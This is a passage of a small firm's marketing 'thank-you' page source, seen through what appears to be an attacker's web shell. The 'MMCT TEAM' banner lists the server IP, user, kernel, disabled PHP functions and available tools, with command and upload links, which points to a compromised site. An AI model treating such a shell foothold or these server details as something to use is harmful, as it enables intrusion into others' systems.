MMCT TEAM
Server IP : 103.191.208.50  /  Your IP : 216.73.216.53
Web Server : LiteSpeed
System : Linux orion.herosite.pro 4.18.0-553.53.1.lve.el8.x86_64 #1 SMP Wed May 28 17:01:02 UTC 2025 x86_64
User : celkcksm ( 1031)
PHP Version : 7.4.33
Disable Function : show_source, system, shell_exec, passthru, popen, exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/celkcksm/cms.acadevo.in/../public_html/ncriptech-landing/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/celkcksm/cms.acadevo.in/../public_html/ncriptech-landing/thank-you.html
<!DOCTYPE html>
<html lang="en">
   <head>
      <meta charset="UTF-8">
      <meta name="theme-color" content="#0034f7">
      <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
      <meta name="format-detection" content="telephone=no">
      <meta name="_token" content="7DzogKJH00LKLcoo6pFW1fJ4q41Pwy9RhJTLvM9o" />
      <link rel="shortcut icon" href="frontend/assets/img/icons/favicon/favicon.ico" />
      <link rel="icon" type="image/png" href="frontend/assets/img/icons/favicon/favicon-32x32.png" sizes="32x32" />
      <link rel="icon" type="image/png" href="frontend/assets/img/icons/favicon/favicon-16x16.png" sizes="16x16" />
    <title>
        Best App Development Company in Kolkata
    </title>
    <meta name="keywords" content="app development company in kolkata,
Best app development company in kolkata,
web app developer near me,
app developers in kolkata,
software development companies in kolkata,
best mobile app development company kolkata,
mobile app development company in kolkata,
best mobile app development agency in Kolkata,
custom app development agency in Kolkata,
    
" />
    <meta name="description" content="We strive as the best app development company in Kolkata. Contact us for web app developer near me, software development companies in Kolkata.
    
" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="Article" />
<meta property="og:title" content="Best App Development Company in Kolkata" />
<meta property="og:site_name" content="Ncriptech is a top software development company" />
<meta property="og:description" content="We strive as the best app development company in Kolkata. Contact us for web app developer near me, software development companies in Kolkata. " />

<link rel="canonical" href="https://www.ncriptech.com/thank-you" />

      <!-- init css -->
      <style>
         @import url("frontend/assets/vendors/swiper@8.0.7/swiper-bundle.min.css");
         @import url("frontend/assets/dart-scss/style.min.css");
      </style>
      <script src="frontend/assets/js/jquery-3.5.1.min.js"></script>
      <script src="frontend/assets/js/jquery.validate.min.js" async></script>
      
      <style>
         .c-preloader {
         display: grid;
         place-items: center;
         color: #fff;
         position: fixed;
         background-color: #000 !important;
         top: 0;
         left: 0;
         right: 0;
         bottom: 0;
         z-index: 999999;
         overflow: hidden;
         opacity: 1;
         visibility: visible;
         }
         .c-preloader.c-loader-fade {
         opacity: 0;
         visibility: hidden;
         }
         .c-preloader svg {
         width: 8em;
         z-index: 1;
         fill: white;
         stroke: none;
         transform: scale(1.6);
         }
         @media (min-width: 2560px) {
         .c-preloader svg {
         transform: scale(2);
         }
         }
         .c-preloader__progress {
         position: absolute;
         top: 0;
         left: 0;
         right: 0;
         bottom: 0;
         background-color: #000;
         }
         .progress {
         background: rgba(255, 255, 255, .2);
         justify-content: flex-start;
         border-radius: 0;
         align-items: center;
         position: absolute;
         padding: 0 5px;
         display: flex;
         height: 10px;
         width: 100%;
         top: 0;
         }
         .progress-value {
         animation: load 3s normal forwards;
         box-shadow: 0 10px 40px -10px #fff;
         border-radius: 0;
         background: #fff;
         height: 10px;
         width: 0;
         }
         @keyframes load {
         0% {
         width: 0;
         }
         100% {
         width: 100%;
         }
         }
         .sundew__hero-texts-animation{
            padding-top: 0rem !important
         }
         header.header-on-scroll .sundew--logo {
            width: 100%;
         }
         .sundew__awards-recognation .dgrid .swiper-slide:nth-child(1) img{
            filter: invert(0);
         }
         .sundew__inner--paragraphs .stacks-grid.stacks-grid-brand {
            grid-template-columns: repeat(8, 1fr);
         }
         .two-column-list {
            display: grid;
            grid-template-columns: repeat(2, minmax(0, 1fr));
            gap: 10px 20px;
            padding-left: 0;
            list-style: none;
          }
          #goTopBtn {
            position: fixed;
            bottom: 40px;
            left: 40px;
            z-index: 99;
            font-size: 18px;
            background-color: #333;
            color: white;
            border: none;
            outline: none;
            width: 50px;
            height: 50px;
            border-radius: 50%;
            cursor: pointer;
            box-shadow: 0 4px 8px rgba(0,0,0,0.3);
            transition: background-color 0.3s, transform 0.3s, opacity 0.3s;
            opacity: 0;
            pointer-events: none;
          }
          
          #goTopBtn.show {
            opacity: 1;
            pointer-events: auto;
          }
          
          #goTopBtn:hover {
            background-color: #555;
            transform: scale(1.1);
          }
          
          #goTopBtn:active {
            transform: scale(0.95);
          }
          
      </style>
      <script>
        window.onscroll = function () {
            const btn = document.getElementById("goTopBtn");
            if (window.scrollY > 0) {
              btn.classList.add("show");
            } else {
              btn.classList.remove("show");
            }
          };
          
          function topFunction() {
            window.scrollTo({ top: 0, behavior: 'smooth' });
          }
          
      </script>
      
      <!-- init js -->
      <style type="text/css">
         .grecaptcha-badge {
         visibility: hidden;
         }
      </style>
      <!-- gsap and scrolltrigger -->
      <script src=" frontend/assets/js/scripts.js?v=3.0.0" defer></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/gsap/3.7.0/ScrollToPlugin.min.js"></script>
      <script src="frontend/assets/js/ScrollSmoother.min.js?v=3.0.0" defer></script>
      <script src="frontend/assets/js/gsap/DrawSVGPlugin.min.js?v=3.0.0" defer></script>
      <script src="frontend/assets/js/gsap/MotionPathPlugin.min.js?v=3.0.0" defer></script>
      <script src="frontend/assets/js/gsap/Draggable.min.js?v=3.0.0" defer></script>
      <script src="frontend/assets/js/gsap/SplitText.min.js?v=3.0.0" defer></script>
      <script src="frontend/assets/js/offerings-anim.js?v=3.0.0" defer></script>
      <!-- phone field -->
      <style>
         @import url("frontend/assets/js/intl-tel/css/intlTelInput.min.css?v=3.0.0");
      </style>
      <script type="text/javascript" src="frontend/assets/js/intl-tel/js/intlTelInput.min.js?v=3.0.0" defer></script>
      <style type="text/css">
         .grecaptcha-badge {
         visibility: hidden;
         }
      </style>
      <script>
         let smoother;
         window.addEventListener('DOMContentLoaded', () => {
             gsap.config({
                 autoSleep: 0,
                 force3D: false,
                 nullTargetWarn: false,
                 trialWarn: false
             });
         
             function recursion(x) {
         
                 if (x >= 1000000000000)
                     return;
                 recursion(x + 1);
             }
         
             function Geeks() {
                 try {
                     recursion(0);
                     console.log("Too much recursion" +
                         " error not occurred");
                 } catch (e) {
                     console.log("Too much recursion" +
                         " error occurred");
                 }
             }
         
             Geeks();
         
             gsap.registerPlugin(ScrollTrigger, ScrollSmoother, MotionPathPlugin, SplitText);
         
             ScrollTrigger.matchMedia({
                 "(min-width: 1200px)": function() {
         
                     ScrollTrigger.refresh();
                     ScrollTrigger.normalizeScroll(true)
                     smoother = ScrollSmoother.create({
                         smooth: 1, // how long (in seconds) it takes to "catch up" to the native scroll position
                         // speed: 1,
                         effects: true, // looks for data-speed and data-lag attributes on elements
                         smoothTouch: 0.1, // much shorter smoothing time on touch devices (default is NO smoothing on touch devices)
                         normalizeScroll: true,
                         ignoreMobileResize: true
                     });
                 }
             });
         });
      </script>

      <!-- Google Tag Manager -->
      <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
      new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
      j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
      'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
      })(window,document,'script','dataLayer','GTM-KBSHFH6W');</script>
      <!-- End Google Tag Manager -->


      <style>
         .banner-image-height-set{
            margin-top: -280px;
         }

         @media only screen and (min-width: 350px) and (max-width: 450px){
            .displaynone-in-mobile{
               display: none !important;
            }
         }
      </style>

      <!-- Meta Pixel Code -->
      <script>
         !function(f,b,e,v,n,t,s)
         {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
         n.callMethod.apply(n,arguments):n.queue.push(arguments)};
         if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
         n.queue=[];t=b.createElement(e);t.async=!0;
         t.src=v;s=b.getElementsByTagName(e)[0];
         s.parentNode.insertBefore(t,s)}(window, document,'script',
         'https://connect.facebook.net/en_US/fbevents.js');
         fbq('init', '2256038881582580');
         fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=2256038881582580&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->

   </head>
   <body id="sundew">
      <!-- Google Tag Manager (noscript) -->
      <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-KBSHFH6W"
      height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
      <!-- End Google Tag Manager (noscript) -->


    <button onclick="topFunction()" id="goTopBtn" title="Go to top">↑</button>
      <div data-scroll-container>
         <span class="drag-cursor">Drag</span>
         <!-- <div id="scroll-indicator"></div> -->
         <svg style="display: none;" xmlns="http://www.w3.org/2000/svg" xmlns:svg="http://www.w3.org/2000/svg">
            <symbol id="svg--arwR">
               <g
                  inkscape:label="Layer 1"
                  inkscape:groupmode="layer"
                  id="layer1"
                  transform="translate(-73.314364,-126.99332)">
                  <path
                     d="m 77.693214,135.75103 -0.88635,-0.89959 2.87073,-2.8575 h -6.36323 v -1.24354 h 6.36323 l -2.87073,-2.87073 0.88635,-0.88635 4.37886,4.37885 z"
                     id="path2"
                     style="stroke-width:0.264583" />
               </g>
            </symbol>
         </svg>
         <svg style="display: none;" viewBox="0 0 381.715 219.42999" xmlns="http://www.w3.org/2000/svg" xmlns:svg="http://www.w3.org/2000/svg">
            <symbol id="svg--videocam">
               <g
                  id="g134"
                  transform="translate(-159.1402,-213.15)">
                  <path
                     d="m 538.57,234.86 c -1.7148,-0.57031 -4,-0.57031 -5.7148,0 l -90.285,47.43 v -34.855 c 0,-18.855 -15.43,-34.285 -34.285,-34.285 h -214.86 c -18.855,0 -34.285,15.43 -34.285,34.285 v 150.86 c 0,18.855 15.43,34.285 34.285,34.285 h 214.86 c 18.855,0 34.285,-15.43 34.285,-34.285 V 363.44 l 90.285,47.426 h 5.7148 c 1.7148,-1.1445 2.2852,-3.4297 2.2852,-5.1445 v -165.71 c 0,-1.7148 -0.57031,-4 -2.2852,-5.1445 z M 431.14,398.29 c 0,12.57 -10.285,22.855 -22.855,22.855 l -214.86,0.004 c -12.57,0.57031 -22.285,-9.1445 -22.855,-21.715 v -1.1445 l -0.004,-150.86 c -0.57031,-12.57 9.1445,-22.285 21.715,-22.855 h 1.1445 214.86 c 12.57,0 22.855,10.285 22.855,22.855 z m 98.285,-2.2852 -86.855,-45.145 v -55.43 l 86.855,-45.145 z"
                     id="path64" />
               </g>
            </symbol>
         </svg>
         <svg style="display: none;" viewBox="0 0 51.411335 19.165352" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:svg="http://www.w3.org/2000/svg">
            <symbol id="svg--sundewLTlong">
               <path
                  d="M 0.635,6.6410462 C 0.23812,7.0379262 0.0042,7.5935618 0,8.1756262 L 0.02575777,19.165351 H 7.296388 v 0 L 7.2495787,8.7312512 c -0.00356,-0.793742 0.66146,-1.45521 1.45521,-1.45521 H 13.070418 L 51.411336,7.2757916 51.364527,0.04681054 8.1756187,1.2471387e-6 C 7.5935391,-6.2962286e-4 7.0379187,0.23812125 6.6145787,0.63500125 L 0.635003,6.6410412"
                  id="path2"/>
            </symbol>
         </svg>
         <svg style="display: none;" viewBox="0 0 834.00001 500.99999" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:svg="http://www.w3.org/2000/svg">
            <symbol id="svg--innerpagecover">
               <path
                  id="path-fill"
                  d="M 8.0829038e-6,0 V 330.87304 H 169.31447 414.12892 c 29.73431,0 54.51172,-18.77935 54.51172,-48.51367 V 118.82031 64.30859 h 272.56445 v 237.87305 c 0,21.80516 -7.92881,41.62728 -23.78711,57.48633 L 575.72071,500.74023 c 0.0187,0.0846 0.036,0.17074 0.0508,0.25977 H 834.00002 V 0 Z m 0,330.87304 c -1.4e-5,-224.58202 -7e-6,-112.29101 0,0 z" />
               <path
                  id="path-stroke"
                  d="M 8.0829038e-6,330.87304 411.67911,330.88044 c 0,0 54.96045,3.34501 56.39582,-46.4747 1.64998,-57.26813 0.5654,-220.09715 0.5654,-220.09715 h 272.56445 l -0.2221,238.58791 c 0,0 0.78828,21.48063 -11.23299,41.18762 -12.02127,19.707 -161.08387,162.3312 -161.08387,162.3312"/>
            </symbol>
         </svg>
         <svg style="display: none;" viewBox="0 0 128 128" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:svg="http://www.w3.org/2000/svg">
            <symbol id="svg--callS">
               <path d="M123.28788,96.79737,100.78819,80.34893a6.26082,6.26082,0,0,0-8.08382.58949l-12.02065,11.805-.04092.04092a5.33619,5.33619,0,0,1-7.50362-.08369L52.35966,71.92108,35.2994,54.86081a5.33619,5.33619,0,0,1-.08369-7.50362l.04092-.04092,11.805-12.02065a6.26082,6.26082,0,0,0,.58949-8.08382L31.20263,4.71212a6.26247,6.26247,0,0,0-9.48412-.73271l-8.47993,8.47993q-.80336.80336-1.5342,1.66808C10.14787,15.9666,6.77822,20.09128,5.49694,22.745a34.59493,34.59493,0,0,0,5.73882,38.17081l55.84846,55.84846a34.59493,34.59493,0,0,0,38.17081,5.73882c2.65369-1.28128,6.77836-4.65093,8.61754-6.20744q.86472-.73083,1.66808-1.5342l8.47993-8.47993A6.26247,6.26247,0,0,0,123.28788,96.79737Z"/>
            </symbol>
         </svg>

         <header id="header" class="theme-white">
            <div class="fulls--request-cta">
               <a href="#" class="c2a-underline c--blak b-0">
               <span>Request for Quote</span>
               </a>
            </div>
            <div class="mainX2-container">
               <div class="inner-container">
                  <a class="sundew--logo-mobile" href="#" tabindex="0">
                        <!-- <i icon="ncriptech"></i> -->
                        <img src="frontend/assets/img/common/ncriptech_logo.webp" alt="Best Software Development Company in Kolkata - Ncriptech" title="Best Software Development Company in Kolkata - Ncriptech">
                  </a>
                  <a class="sundew--logo d-inline-block" href="#" aria-label="Sundew Home Page" tabindex="1">
                    
                    <!-- <i icon="ncriptech"></i> -->
                    <img src="frontend/assets/img/common/ncriptech_logo.webp" alt="Best Software Development Company in Kolkata - Ncriptech" title="Best Software Development Company in Kolkata - Ncriptech">
                  </a>
                  <nav>
                     <ul>
                        <li class="has-submenu has-submenu--company company--menu">
                           <span>Company</span>
                           <div class="submenu">
                              <div class="submenu--company">
                                 <figure class="submenu--company-fig">
                                    <img src="frontend/assets/img/2024_v1/aboutMenuHero.webp" alt="Sundew" title="Sundew" />
                                 </figure>
                                 <div class="submenu--company-items">
                                    <ul role="list">
                                       <li><a href="https://www.ncriptech.com/about" aria-label="About Us Page">About Us <i icon="arwR4"></i> </a></li>
                                       <li><a href="https://www.ncriptech.com/news" aria-label="Our Leadership Page">News <i icon="arwR4"></i> </a></li>
                                       <li><a href="https://www.ncriptech.com/success_stories" aria-label="Culture &amp; Values Page">Success Stories <i icon="arwR4"></i> </a></li>
                                      
                                    </ul>
                                 </div>
                                 <div class="submenu--company-btm">
                                    <a href="#" class="c2a outline c2a-arw c2a--inline hvr:bg--sundewblu hvr:c--whitee"> <span>Let's Connect</span> <i icon="arwR"></i></a>
                                 </div>
                              </div>
                           </div>
                        </li>
                        <li class="has-submenu has-submenu--practice new-practice-menu">
                           <span>Practices</span>
                           <div class="submenu">
                              <div class="submenu--practice-new">
                                 <nav class="menu">
                                    <a href="#" class="active" onclick="setActiveTab(event, 'Customer-Experience')">Mobile Application Development</a>
                                    <a href="#" onclick="setActiveTab(event, 'Data-Generative')">Website Development</a>
                                    <a href="#" onclick="setActiveTab(event, 'Application-Engineering')">Digital Marketing</a>
                                    <a href="#" onclick="setActiveTab(event, 'Modernization-Strategies')">Custom Software Development</a>
                                 </nav>
                                 <div class="container menu-tab-content active" id="Customer-Experience">
                                    <div class="left">
                                       <figure>
                                          <img src="frontend/assets/img/2025_v1/sap/practiceMenuHero1.webp" alt="Mobile Application Development" title="Mobile Application Development" />
                                       </figure>
                                    </div>
                                    <div class="middle flow-rootx">
                                       <p class="h4 fw--m">Mobile. <br/>Application Development.</p>
                                       <!-- <p class="h9">Deliver consistent, user-centric solutions that enhance engagement and streamline journeys across all platforms for scalable enterprise impact.</p> -->
                                    </div>
                                    <div class="right">
                                       <div class="link--row">
                                          <a href="https://www.ncriptech.com/android-application-services" class="link-row"><span>Android Application Development</span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/ios-application-services" class="link-row"><span>IOS Application Development</span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/crossplatform-application-services" class="link-row"><span>Cross Platform App Development</span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/custom-application-services" class="link-row"><span>Custom Application Development</span><i icon="arwR4"></i></a>
                                       </div>
                                       <div class="cta flow-rootx">
                                          <p class="h5">Your next begins here <span class="c--blu fw--r">@ncriptech</span></p>
                                          <a href="https://www.ncriptech.com/contact" class="c2a outline c2a-arw c2a--inline c--blak hvr:bg--blu hvr:c--whitee radius:expandedX2 b-0">
                                          <span>Let’s Connect</span>
                                          <i icon="arwR"></i>
                                          </a>
                                       </div>
                                    </div>
                                 </div>
                                 <div class="container menu-tab-content" id="Data-Generative">
                                    <div class="left">
                                       <figure>
                                          <img src="frontend/assets/img/2025_v1/sap/practiceMenuHero2.webp?v=3.0.0" alt="Data & Generative AI" title="Data & Generative AI" />
                                       </figure>
                                    </div>
                                    <div class="middle flow-rootx">
                                       <p class="h4 fw--m">Website. <br/>Development.</p>
                                       <!-- <p class="h9">Transform data into actionable intelligence and automate processes with AI solutions built for reliability, adaptability, and future-ready performance.</p> -->
                                    </div>
                                    <div class="right">
                                       <div class="link--row">
                                          <a href="https://www.ncriptech.com/web-application-services" class="link-row"><span>Web Application Development</span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/uiux-services" class="link-row"><span>UI/UX Design</span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/website-services" class="link-row"><span>Website Development</span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/custom-website-services" class="link-row"><span>Custom Website Development</span><i icon="arwR4"></i></a>
                                       </div>
                                       <div class="cta flow-rootx">
                                          <p class="h5">Your next begins here <span class="c--blu fw--r">@ncriptech</span></p>
                                          <a href="https://www.ncriptech.com/contact" class="c2a outline c2a-arw c2a--inline c--blak hvr:bg--blu hvr:c--whitee radius:expandedX2 b-0">
                                          <span>Let’s Connect</span>
                                          <i icon="arwR"></i>
                                          </a>
                                       </div>
                                    </div>
                                 </div>
                                 <div class="container menu-tab-content" id="Application-Engineering">
                                    <div class="left">
                                       <figure>
                                          <img src="frontend/assets/img/2025_v1/sap/practiceMenuHero3.webp?v=3.0.0" alt="Digital Marketing" title="Digital Marketing" />
                                       </figure>
                                    </div>
                                    <div class="middle flow-rootx">
                                       <p class="h4 fw--m">Digital. <br/>Marketing.</p>
                                       <!-- <p class="h9">Build scalable solutions that enhance usability, captivate users, and maintain consistent stability throughout the product lifecycle.</p> -->
                                    </div>
                                    <div class="right">
                                       <div class="link--row">
                                          <a href="https://www.ncriptech.com/seo-services" class="link-row"><span>SEO-Search Engine Optimization</span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/smo-services" class="link-row"><span>SMO - Social Media Optimization</span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/facebook-marketing-services" class="link-row"><span> Social Media Marketing</span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/ecommerce-marketing-services" class="link-row"><span>E-Commerce Marketing</span><i icon="arwR4"></i></a>
                                       </div>
                                       <div class="cta flow-rootx">
                                          <p class="h5">Your next begins here <span class="c--blu fw--r">@ncriptech</span></p>
                                          <a href="https://www.ncriptech.com/contact" class="c2a outline c2a-arw c2a--inline c--blak hvr:bg--blu hvr:c--whitee radius:expandedX2 b-0">
                                          <span>Let’s Connect</span>
                                          <i icon="arwR"></i>
                                          </a>
                                       </div>
                                    </div>
                                 </div>
                                 <div class="container menu-tab-content" id="Modernization-Strategies">
                                    <div class="left">
                                       <figure>
                                          <img src="frontend/assets/img/2025_v1/sap/practiceMenuHero4.webp?v=3.0.0" alt="Custom Software Development" title="Custom Software Development" />
                                       </figure>
                                    </div>
                                    <div class="middle flow-rootx">
                                       <p class="h4 fw--m">Custom. <br/>Software Development.</p>
                                       <!-- <p class="h9">Advance your organization with modern technologies and streamlined processes, ensuring adaptability, resilience, and sustained growth in today’s fast-changing market.</p> -->
                                    </div>
                                    <div class="right">
                                       <div class="link--row">
                                          <a href="https://www.ncriptech.com/wordpress-services" class="link-row"><span>Wordpress Development</span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/magento-services" class="link-row"><span>Magento Development</span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/codeigniter-services" class="link-row"><span>CodeIgniter Development </span><i icon="arwR4"></i></a>
                                          <a href="https://www.ncriptech.com/opencart-services" class="link-row"><span>Opencart Development</span><i icon="arwR4"></i></a>
                                       </div>
                                       <div class="cta flow-rootx">
                                          <p class="h5">Your next begins here <span class="c--blu fw--r">@ncriptech</span></p>
                                          <a href="https://www.ncriptech.com/contact" class="c2a outline c2a-arw c2a--inline c--blak hvr:bg--blu hvr:c--whitee radius:expandedX2 b-0">
                                          <span>Let’s Connect</span>
                                          <i icon="arwR"></i>
                                          </a>
                                       </div>
                                    </div>
                                 </div>
                              </div>
                           </div>
                        </li>
                        <li class="has-submenu has-submenu--industries">
                           <span>Products</span>
                           <div class="submenu">
                              <div class="submenu--industries">
                                 <div class="submenu--industries-fig">
                                    <figure class="submenu--company-fig">
                                       <img src="frontend/assets/img/2024_v1/industryMenuHero.webp" alt="Ncripech" title="Ncripech" />
                                    </figure>
                                    <figcaption>Products We Offer</figcaption>
                                 </div>
                                 <div class="submenu--industries-items">
                                    <ul role="list">
                                       <li><a href="https://www.ncriptech.com/interface">INTERFACE <i icon="arwR4"></i></a></li>
                                       <li><a href="https://www.ncriptech.com/mobidev">MOBI DEV <i icon="arwR4"></i></a></li>
                                       <li><a href="https://www.ncriptech.com/codex">CODEX <i icon="arwR4"></i></a></li>
                                       <li><a href="https://www.ncriptech.com/keywords">KEYWORDS <i icon="arwR4"></i></a></li>
                                       <li><a href="https://www.ncriptech.com/pixelplus">PIXEL PLUS <i icon="arwR4"></i></a></li>
                                       <li><a href="https://www.ncriptech.com/impulse">IMPULSE <i icon="arwR4"></i></a></li>
                                       <li><a href="https://www.ncriptech.com/thinktank">THINKTANK <i icon="arwR4"></i></a></li>
                                       <li><a href="https://www.ncriptech.com/cloudcampus">CLOUD CAMPUS <i icon="arwR4"></i></a></li>
                                       <li><a href="https://www.ncriptech.com/sims">SIMS4.0 <i icon="arwR4"></i></a></li>
                                       <li><a href="https://www.ncriptech.com/ehm">EHM <i icon="arwR4"></i></a></li>
                                       <li><a href="https://www.ncriptech.com/flexibook">FLEXIBOOK <i icon="arwR4"></i></a></li>
                                    </ul>
                                 </div>
                                 <div class="submenu--industries-btm">
                                    <a href="https://www.ncriptech.com/contact" class="c2a outline c2a-arw c2a--inline hvr:bg--sundewblu hvr:c--whitee"> <span>Let's Connect</span> <i icon="arwR"></i></a>
                                 </div>
                              </div>
                           </div>
                        </li>
                        <li><a aria-label="CONNECT Page" href="https://www.ncriptech.com/contact">Connect</a></li>
                        
                     </ul>
                     <!-- <a href="https://www.ncriptech.com/contact" class="c2a c2a-arw c2a--inline outline c--blak hvr:bg--sundewblu hvr:c--whitee radius:expandedX2 b-0 hide-on-mobP" style="width: 11rem; background-color: red; ">Let's
                                 Connect <i icon="arwR"></i></a> -->

                     
                     <div class="menu-icon">
                        <span class="menu-icon__line"></span>
                        <span class="menu-icon__line"></span>
                        <span class="menu-icon__line"></span>
                     </div>
                  </nav>
                  <figure class="gptw--logo">
                     <a href="https://g.page/r/CVcPvSUCkP04EBE/review" target="_blank"><img src="frontend/assets/img/common/nav-menu/google-review.png" alt="google-reviews" title="Google Review" /></a>
                  </figure>
               </div>
            </div>
         </header>
         <div class="nav-container">
            <div class="nav-overflow">
               <div class="menu-close">
                  <svg width="634" height="634" viewBox="0 0 634 634" fill="none" xmlns="http://www.w3.org/2000/svg">
                     <path d="M317 617C277.603 617 238.593 609.24 202.195 594.163C165.797 579.087 132.726 556.99 104.868 529.133C77.0103 501.273 54.9127 468.203 39.836 431.807C24.7597 395.407 17 356.397 17 317C17 277.603 24.7597 238.593 39.836 202.195C54.9127 165.797 77.0103 132.726 104.868 104.868C132.726 77.0103 165.797 54.9127 202.195 39.836C238.593 24.7597 277.603 17 317 17C356.397 17 395.407 24.7597 431.807 39.836C468.203 54.9127 501.273 77.0103 529.133 104.868C556.99 132.726 579.087 165.797 594.163 202.195C609.24 238.593 617 277.603 617 317C617 356.397 609.24 395.407 594.163 431.807C579.087 468.203 556.99 501.273 529.133 529.133C501.273 556.99 468.203 579.087 431.803 594.163C395.407 609.24 356.397 617 317 617Z" stroke="currentColor" stroke-width="33.3333" stroke-linecap="round"/>
                     <path d="M217 217L417 417" stroke="currentColor" stroke-width="33.3333" stroke-linecap="round"/>
                     <path d="M417 217L217 417" stroke="currentColor" stroke-width="33.3333" stroke-linecap="round"/>
                  </svg>
               </div>
               <nav class="menu menu-grid">
                  <div class="menu-f-grid">
                     <a class="sundew--logo d-inline-block" href="https://www.ncriptech.com" aria-label="Sundew Home Page" tabindex="1">
                        <img src="/frontend/assets/img/common/ncriptech_logo.webp" alt="Best Software Development Company in Kolkata - Ncriptech" title="Best Software Development Company in Kolkata - Ncriptech">
                     </a>

                     <h6>Since 2009, Ncriptech has evolved from a bootstrapped venture into a global IT services and consulting leader. </h6>
                     <a href="https://www.ncriptech.com/contact" class="c2a c2a--inline c2a--arw bg--blu c--whitee hvr:bg--ylw hvr:c--blak">
                     <span>Request for Quote</span> <i icon="arwR4"></i>
                     </a>
                  </div>
                  <div class="menu-inner-grid">
                     <div class="menu-item menu-item-full">
                        <h6 class="menu__heading">PRACTICES</h6>
                        <div class="menu__item-heading">
                           <a href="https://www.ncriptech.com/mobile-application-development" class="menu__item-link" href="#CustomerExperience" data-hover-content="Mobile Application Development Mobile Application Development Mobile Application Development Mobile Application Development Mobile Application Development Mobile Application Development Mobile Application Development Mobile Application Development Mobile Application Development Mobile Application Development Mobile Application Development"
                              data-href="#CustomerExperience" data-link="Mobile Application Development">Mobile Application Development <i icon="arwR4"></i></a>
                        </div>
                        <div class="menu__item-heading">
                           <a href="https://www.ncriptech.com/website-development" class="menu__item-link" href="#DataGenerativeAI" data-hover-content="Website Development Website Development Website Development Website Development Website Development Website Development Website Development Website Development Website Development Website Development Website Development Website Development Website Development Website Development Website Development Website Development"
                              data-href="#DataGenerativeAI" data-link="Website Development">Website Development <i icon="arwR4"></i></a>
                        </div>
                        <div class="menu__item-heading">
                           <a href="https://www.ncriptech.com/digital-marketing" class="menu__item-link" href="#ApplicationEngineering" data-hover-content="Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing Digital Marketing"
                              data-href="#ApplicationEngineering" data-link="Digital Marketing">Digital Marketing <i icon="arwR4"></i></a>
                        </div>
                        <div class="menu__item-heading">
                           <a href="https://www.ncriptech.com/custom-software-development" class="menu__item-link" href="#ModernizationStrategies" data-hover-content="Custom Software Development Custom Software Development Custom Software Development Custom Software Development Custom Software Development Custom Software Development Custom Software Development Custom Software Development Custom Software Development Custom Software Development Custom Software Development Custom Software Development Custom Software Development Custom Software Development Custom Software Development"
                              data-href="#ModernizationStrategies" data-link="Custom Software Development">Custom Software Development <i icon="arwR4"></i></a>
                        </div>
                     </div>
                     <div class="menu-item-accord-cont">
                        <div class="menu-item menu-item-accord flow-rootx2">
                           <h6 class="menu__heading">Company</h6>
                           <ul class="menu__item--sub sub--list" role="list">
                              <li><a href="https://www.ncriptech.com/about">About Us</a></li>
                              <li><a href="https://www.ncriptech.com/news">News </a></li>
                              <li><a href="https://www.ncriptech.com/success_stories">Success Stories</a></li>
                              <li><a href="https://www.ncriptech.com/contact">Contact Us</a></li>
                           </ul>
                        </div>
                        <!-- <div class="menu-item menu-item-accord">
                           <h6 class="menu__heading">Resources</h6>
                           <ul class="menu__item--sub arrow--cta" role="list">
                           <li><a href="https://sundewsolutions.com/blog"><i icon="arwR4"></i> Thoughts &amp; Insights</a></li>
                           <li><a href="https://sundewsolutions.com/success-stories"><i icon="arwR4"></i> Success Stories</a></li>
                           </ul>
                           </div> -->
                     </div>
                  </div>
                  <div class="industries-full-menu">
                     <div class="menu-item">
                        <h6 class="menu__heading">Products</h6>
                        <ul class="menu__item--sub industries-new-menu arrow--cta" role="list">
                           <li><a href="https://www.ncriptech.com/interface"><i icon="arwR4"></i> INTERFACE</a></li>
                           <li><a href="https://www.ncriptech.com/mobidev"><i icon="arwR4"></i> MOBI DEV</a></li>
                           <li><a href="https://www.ncriptech.com/codex"><i icon="arwR4"></i> CODEX</a></li>
                           <li><a href="https://www.ncriptech.com/keywords"><i icon="arwR4"></i> KEYWORDS</a></li>
                           <li><a href="https://www.ncriptech.com/pixelplus"><i icon="arwR4"></i> PIXEL PLUS</a></li>
                           <li><a href="https://www.ncriptech.com/impulse"><i icon="arwR4"></i> IMPULSE</a></li>
                           <li><a href="https://www.ncriptech.com/thinktank"><i icon="arwR4"></i> THINKTANK</a></li>
                           <li><a href="https://www.ncriptech.com/cloudcampus"><i icon="arwR4"></i> CLOUD CAMPUS</a></li>
